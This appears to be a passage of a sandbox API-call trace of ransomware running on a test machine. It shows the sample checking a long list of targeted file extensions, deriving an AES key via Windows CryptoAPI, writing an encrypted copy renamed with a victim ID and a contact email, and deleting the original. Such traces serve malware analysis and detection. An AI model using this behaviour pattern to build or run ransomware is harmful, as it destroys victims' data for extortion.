	[0200.359] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\", lpString2="hE_M_wDBcnl.flv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\hE_M_wDBcnl.flv") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\hE_M_wDBcnl.flv"
	[0200.359] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\hE_M_wDBcnl.flv") returned 114
	[0200.359] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0200.359] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\hE_M_wDBcnl.flv", cchLength=0x72 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\he_m_wdbcnl.flv") returned 0x72
	[0200.360] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.360] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\he_m_wdbcnl.flv", lpSrch="help_decrypt_your_files") returned 0x0
	[0200.360] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\he_m_wdbcnl.flv" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\he_m_wdbcnl.flv") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\he_m_wdbcnl.flv"
	[0200.360] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\he_m_wdbcnl.flv") returned 114
	[0200.360] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0200.360] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.362] StrStrW (lpFirst=".flv", lpSrch=".") returned=".flv"
	[0200.362] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.362] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".flv") returned=".flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0200.362] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0200.363] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0200.363] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\he_m_wdbcnl.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\he_m_wdbcnl.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0200.368] ReadFile (in: hFile=0x39c, lpBuffer=0xfdf190, nNumberOfBytesToRead=0x11183, lpNumberOfBytesRead=0x188c20, lpOverlapped=0x0 | out: lpBuffer=0xfdf190*, lpNumberOfBytesRead=0x188c20*=0x11183, lpOverlapped=0x0) returned 1
	[0200.371] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.372] CryptAcquireContextW (in: phProv=0x1887d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1887d0*=0xfcb220) returned 1
	[0200.374] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.374] CryptCreateHash (in: hProv=0xfcb220, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1887d4 | out: phHash=0x1887d4) returned 1
	[0200.374] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.375] CryptHashData (hHash=0xfb91b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0200.375] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.375] CryptDeriveKey (in: hProv=0xfcb220, Algid=0x6610, hBaseData=0xfb91b0, dwFlags=0x1, phKey=0x1887d8 | out: phKey=0x1887d8*=0xfb8f70) returned 1
	[0200.375] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.375] CryptEncrypt (in: hKey=0xfb8f70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1887ec*=0x11183, dwBufLen=0x11183 | out: pbData=0x0*, pdwDataLen=0x1887ec*=0x11190) returned 1
	[0200.492] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0200.493] RtlMoveMemory (in: Destination=0xff0320, Source=0xfdf190, Length=0x11183 | out: Destination=0xff0320) 
	[0200.493] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.493] CryptEncrypt (in: hKey=0xfb8f70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff0320*, pdwDataLen=0x1887cc*=0x11183, dwBufLen=0x11190 | out: pbData=0xff0320*, pdwDataLen=0x1887cc*=0x11190) returned 1
	[0200.494] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.494] CryptDestroyKey (hKey=0xfb8f70) returned 1
	[0200.494] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.494] CryptDestroyHash (hHash=0xfb91b0) returned 1
	[0200.494] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.494] CryptReleaseContext (hProv=0xfcb220, dwFlags=0x0) returned 1
	[0200.494] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0200.495] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1887e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1887e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0200.495] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.496] GetUserNameA (in: lpBuffer=0x1886cc, pcbBuffer=0x1887e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1887e4) returned 1
	[0200.497] wsprintfW (in: param_1=0x188800, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\he_m_wdbcnl.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 156
	[0200.497] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\he_m_wdbcnl.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\he_m_wdbcnl.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0200.498] WriteFile (in: hFile=0x3a0, lpBuffer=0xff0320*, nNumberOfBytesToWrite=0x11190, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0xff0320*, lpNumberOfBytesWritten=0x188c28*=0x11190, lpOverlapped=0x0) returned 1
	[0200.504] CloseHandle (hObject=0x3a0) returned 1
	[0200.504] CloseHandle (hObject=0x39c) returned 1
	[0200.505] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\he_m_wdbcnl.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\he_m_wdbcnl.flv")) returned 1
	[0200.512] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\he_m_wdbcnl.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\he_m_wdbcnl.flv")) returned 0
	[0200.512] FindNextFileW (in: hFindFile=0xfb8eb0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65865a50, ftCreationTime.dwHighDateTime=0x1d96a97, ftLastAccessTime.dwLowDateTime=0x463aedd0, ftLastAccessTime.dwHighDateTime=0x1d9715b, ftLastWriteTime.dwLowDateTime=0x463aedd0, ftLastWriteTime.dwHighDateTime=0x1d9715b, nFileSizeHigh=0x0, nFileSizeLow=0xaac6, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="S5TikBRDPpN.swf", cAlternateFileName="S5TIKB~1.SWF")) returned 1
	[0200.512] lstrcmpW (lpString1="S5TikBRDPpN.swf", lpString2="..") returned 1
	[0200.512] lstrcmpW (lpString1="S5TikBRDPpN.swf", lpString2=".") returned 1
	[0200.512] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\"
	[0200.513] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\", lpString2="S5TikBRDPpN.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\S5TikBRDPpN.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\S5TikBRDPpN.swf"
	[0200.513] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\S5TikBRDPpN.swf") returned 114
	[0200.513] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
